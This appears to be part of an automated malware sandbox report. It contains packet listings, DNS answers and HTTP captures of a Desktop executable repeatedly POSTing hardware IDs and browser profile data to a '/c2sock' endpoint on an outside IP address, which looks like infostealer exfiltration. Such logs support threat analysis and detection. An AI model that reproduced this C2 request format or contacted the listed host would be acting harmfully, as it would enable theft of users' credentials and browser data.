Nov 13, 2024 10:53:54.429917097 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.481672049 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.481893063 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.529695034 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.529881001 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.577399969 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.577501059 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.625716925 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.625797033 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.673612118 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.673723936 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.721762896 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.721883059 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.769609928 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.769722939 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.817533016 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.817682981 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.869499922 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.869616032 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.917643070 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.917871952 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:54.965455055 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:54.965547085 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.013722897 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.013859034 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.065666914 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.065799952 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.117602110 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.117829084 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.165452957 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.165537119 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.213546038 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.213627100 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.261476040 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.261632919 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.313513041 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.313613892 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.361552954 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.361720085 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.413635015 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.413785934 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.465604067 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.465747118 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.513621092 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.513729095 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.565644026 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.565767050 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.613742113 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.613925934 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.661509037 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.661675930 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.709538937 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.709703922 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.761611938 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.761702061 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.813693047 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.813812971 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:55.861411095 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:55.861531973 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.109730959 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.109844923 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.157599926 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.157773018 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.205497980 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.205763102 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.253586054 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.253735065 CET	49980	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.516568899 CET	80	49980	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.914824963 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.919939995 CET	80	49981	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.920036077 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.922374964 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.922898054 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:53:56.927264929 CET	80	49981	94.158.244.69	192.168.2.9
Nov 13, 2024 10:53:56.927804947 CET	80	49981	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:05.396538019 CET	80	49981	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:05.396672010 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.396857023 CET	49981	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.401731014 CET	80	49981	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:05.725703955 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.730720043 CET	80	49982	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:05.730789900 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.730923891 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.731324911 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:05.735932112 CET	80	49982	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:05.736185074 CET	80	49982	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:14.201185942 CET	80	49982	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:14.201355934 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.201560020 CET	49982	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.206455946 CET	80	49982	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:14.665246010 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.671256065 CET	80	49983	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:14.671372890 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.671668053 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.672238111 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:14.677119017 CET	80	49983	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:14.677638054 CET	80	49983	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:23.154150963 CET	80	49983	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:23.154328108 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.154366970 CET	49983	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.160890102 CET	80	49983	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:23.454792023 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.459851980 CET	80	49984	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:23.459990978 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.460114956 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.460529089 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:23.465070963 CET	80	49984	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:23.465387106 CET	80	49984	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:31.935220957 CET	80	49984	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:31.935364962 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:31.935455084 CET	49984	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:31.940392971 CET	80	49984	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:32.248076916 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:32.253062010 CET	80	49985	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:32.253192902 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:32.253587008 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:32.254940987 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:32.258415937 CET	80	49985	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:32.259800911 CET	80	49985	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:40.737131119 CET	80	49985	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:40.737247944 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:40.737322092 CET	49985	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:40.742356062 CET	80	49985	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:41.031769991 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:41.036911011 CET	80	49986	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:41.037025928 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:41.037240982 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:41.037622929 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:41.042040110 CET	80	49986	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:41.042493105 CET	80	49986	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:49.522548914 CET	80	49986	94.158.244.69	192.168.2.9
Nov 13, 2024 10:54:49.522715092 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:49.522779942 CET	49986	80	192.168.2.9	94.158.244.69
Nov 13, 2024 10:54:49.527621984 CET	80	49986	94.158.244.69	192.168.2.9

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 13, 2024 10:51:54.627157927 CET	1.1.1.1	192.168.2.9	0xbe8c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 13, 2024 10:51:54.627157927 CET	1.1.1.1	192.168.2.9	0xbe8c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

94.158.244.69

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49822	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:52:44.624311924 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 16465 Host: 94.158.244.69
Nov 13, 2024 10:52:44.624716043 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:52:44.629723072 CET	1236	OUT	Data Raw: b8 98 24 1a ee a2 4a 31 fc f4 2d 36 61 7d 5f f8 0d 69 3d 38 2d 4a 33 33 99 fd 62 c4 58 54 bc e5 3a 98 95 e2 43 cf c6 1a 92 51 19 79 8c 99 04 a4 16 6d da ee bc 66 33 6b 88 2f ce 7c 7e 3f 38 eb f9 13 b9 bf 0d 89 18 84 dd 34 23 49 14 0a ad ad 6f 8b Data Ascii: $J1-6a}_i=8-J33bXT:CQymf3k/\|~?84#Iolfgj>7;,)emVVV*(MLd^1EsHHi)8;@IAMQhpZS`hA4SjuF-~~
Nov 13, 2024 10:52:44.630249977 CET	4105	OUT	Data Raw: 00 a4 0f ec ff 01 00 00 80 f4 81 fd 3f 00 00 00 90 3e b0 ff 07 00 00 00 d2 07 d6 7f 00 00 00 20 7d 60 fd 07 00 00 00 d2 07 7e ff 07 00 00 00 d2 47 7e e0 4d 21 97 d5 04 f1 9f 72 ff 9b 9b cf 6a fd 7f 3d 50 13 00 00 df 14 fb 73 1f 88 d2 93 27 99 17 Data Ascii: ?> }`~G~M!rj=Ps'RhEjQVuJ{<k#EtvR]_Z"x@HIKrwrL,hm/#_\|+xV+6;:TFC-UIi$)dAc8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49873	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:52:53.680162907 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 18997 Host: 94.158.244.69
Nov 13, 2024 10:52:53.680804014 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:52:53.685009003 CET	1236	OUT	Data Raw: e8 c3 8f a3 ae 0d 8d b9 67 93 5e 50 24 18 24 36 71 d3 60 97 16 45 26 29 74 57 1a 43 81 dc 9d 92 ab 4c 68 08 46 e3 ce d7 7c 7b b0 7e 96 6b 9d 3f 5f dd b7 86 e3 0d 8d 77 21 d5 84 19 9a 67 bb bb ee a1 80 d5 fc 28 33 1b 0d 9d 25 77 bb 51 41 bf 99 58 Data Ascii: g^P$$6q`E&)tWCLhF\|{~k?_w!g(3%wQAXv 0xu{^4B[nu0K_nozI5%~rPvEIo}"*i]\|nv\|v]-D_Z.T_TQ"V\|6lH-@zLY~/z
Nov 13, 2024 10:52:53.685817957 CET	4944	OUT	Data Raw: 47 5d 12 84 07 5f 98 1d 40 c3 04 7e 70 84 1b e7 28 06 6d 87 e3 e2 1e c4 9c 3d 9b 79 78 1e 7a 55 3d ca 0f f4 51 6d dd be a3 36 5a db 97 cb 9a 88 b9 ba 0e 52 68 eb d8 4b 66 fb 6e 79 dc 1b 8f 0d 85 6b 5d be 7c e0 c5 b8 5c b2 3c c6 ca 35 65 b9 dc dc Data Ascii: G]_@~p(m=yxzU=Qm6ZRhKfnyk]\|\<5eFM'1bexbXyf2IxH0m,0X(i#a(F!L5Xsys<Y${\|!$t3/ , AA# AY<p Ad8]2L
Nov 13, 2024 10:52:53.685841084 CET	1693	OUT	Data Raw: b8 28 e6 26 f4 a2 11 17 b8 a5 eb 4b d3 fd c2 dc c8 08 83 3e 8b 8f 32 09 3d 3f 7d b6 35 a5 e9 73 d3 dd 2e f3 ad 40 32 19 06 77 17 27 89 ba ff 3f 26 c6 b1 f1 c1 f8 64 fc 30 be 11 00 00 00 00 00 00 00 b8 54 b3 7a 59 fb 73 1d 20 9d d3 8b 5a 4c fb 44 Data Ascii: (&K>2=?}5s.@2w'?&d0TzYs ZLD^_Tz^'nsG*?"p~PK#m.PPK&mYEdge/Default/BrowserDB/CURRENTuts5C.PKr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49923	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:02.747658968 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:53:02.748101950 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49974	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:11.772420883 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:53:11.772795916 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49977	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:20.556585073 CET	188	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 440 Host: 94.158.244.69
Nov 13, 2024 10:53:20.556936979 CET	440	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49978	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:29.597868919 CET	190	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 20514 Host: 94.158.244.69
Nov 13, 2024 10:53:29.598329067 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:53:29.602725983 CET	1236	OUT	Data Raw: ad 16 87 46 e2 e1 2e 9d 79 eb 03 a0 e5 19 56 6f a5 bf ff e0 db 33 7d a7 07 d6 ba da 5a 47 d6 b8 d0 5a 53 36 cd a7 de 96 ed 3b bc ab 75 ff 58 c8 ba 58 8a 96 b9 b1 3d b6 cf da b8 ea 46 ee 50 b3 79 33 2f cb ce 6f ab 1f eb a5 fa e7 53 b7 ae 3d 8a b1 Data Ascii: F.yVo3}ZGZS6;uXX=FPy3/oS=Jy}n0F#}djAhy[<!`(w__Y>7]\:$jmS(hvxXH;kj4ne_m&/vfvJOtUkZm^Vae3l
Nov 13, 2024 10:53:29.603280067 CET	2472	OUT	Data Raw: f1 71 64 a2 5c 2f 5b b8 58 28 4d 16 86 27 a3 86 cb f9 2b e5 d9 9d 3d 9d ce 7d aa 38 5a 2a ec 2a 4d 45 9f ca 57 eb 09 8d cc 81 3d fb ee db 79 ef fe 3d f7 ec bf 77 f7 e8 bd bb ef f9 a5 9d cf cd 8c 27 27 32 9b 82 5f 09 06 72 b9 c6 cc 46 93 bd d6 bc Data Ascii: qd\/[X(M'+=}8Z**MEW=y=w''2_rFuG}^+'F=gNm$-x@www.Wf\HfB<8MHrTr:P+'zHajP~pxi J\kO+OcfcS?V~l{3
Nov 13, 2024 10:53:29.603368998 CET	2472	OUT	Data Raw: f8 89 f0 2f c2 af 86 ff 24 7c 31 ac 86 a3 51 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc ac 6e 4e 27 32 89 ae 20 93 79 fd d9 4f 7e f1 d5 0d f5 68 ba 11 3d 78 fb 4d f5 68 aa 19 ed a9 47 93 cd Data Ascii: /$\|1QnN'2 yO~h=xMhGh7$b,XR{6WSZInbf^O4a1_I_NZ(_$Lg?W7,E~Sk5ktFO\|3K=IFR
Nov 13, 2024 10:53:29.603410959 CET	2472	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 10:53:29.603435993 CET	738	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49979	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:38.629818916 CET	189	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 1135 Host: 94.158.244.69
Nov 13, 2024 10:53:38.630177021 CET	1135	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49980	94.158.244.69	80	7712	C:\Users\user\Desktop\OlZzqwjrwO.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 10:53:47.808826923 CET	191	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 594382 Host: 94.158.244.69
Nov 13, 2024 10:53:47.809458971 CET	11124	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:53:47.814718962 CET	1236	OUT	Data Raw: bc 8f 9a fa 5f f4 8c e0 aa 5d 6f cb 6a fc af 90 b1 4e d0 e4 80 69 eb fc 2a f5 bf f4 89 f4 b2 d8 eb 8b c1 fe 5e e1 81 d2 fa fc 6b 0d b5 7b bd 4c 7e 96 d9 fb 8a 31 db a6 7b 8a 55 f4 18 7b cf ed 61 e8 27 f6 ea 00 f9 bc 5f dd ff 2b e6 7f ac 7d bc 50 Data Ascii: _]ojNi^k{L~1{U{a'_+}PU?Vlx?1=Gm#I/9#R'd:I%S}U<X]V>)Ff%$K^,wCYrG!Y\|{,b,=7,_n,fLYp}!T
Nov 13, 2024 10:53:47.815501928 CET	2472	OUT	Data Raw: 7b 6c 92 fc 4f 1b 9e 17 6e 7c 64 7f f0 3f 93 0d fa 2e 78 4c 7b 6c e0 7d a6 63 f0 3f 9e 28 fb 93 c7 52 d7 ff f5 ef ea d7 fb 71 fb f3 c3 dc 4f 46 1b a0 67 7e f0 be 31 47 76 d5 af 14 6d 83 74 9c ce 93 f1 b1 e0 b8 0c ce 8f a4 7a 42 8a b0 3f e9 7f d2 Data Ascii: {lOn\|d?.xL{l}c?(RqOFg~1GvmtzB?Q9q^}:Y@-vw<ZAnNGGvG5?Nk6eR/hvWkg?2?-5
Nov 13, 2024 10:53:47.815525055 CET	2472	OUT	Data Raw: c7 67 fe f2 9e 60 b9 ad 67 81 b0 3e 5f d4 ef c1 ff c8 f7 70 1c d6 07 df a3 d7 31 fd 7a f8 fe c7 cd 10 e6 07 03 84 ff 91 e3 f1 3e 60 6e 82 a6 63 bc 36 50 fa 1f 1d d3 d7 79 35 7d a8 eb e3 86 47 e7 64 bf 2f f7 3b d9 ff 4b 9e 27 e7 fc 62 7d 40 be 06 Data Ascii: g`g>_p1z>`nc6Py5}Gd/;K'b}@ O+Y_#(k6<^M%T;?Yg?Yxi?`>7J F{_ZW2>Z& }:7zAEJ>XW=6<=^k
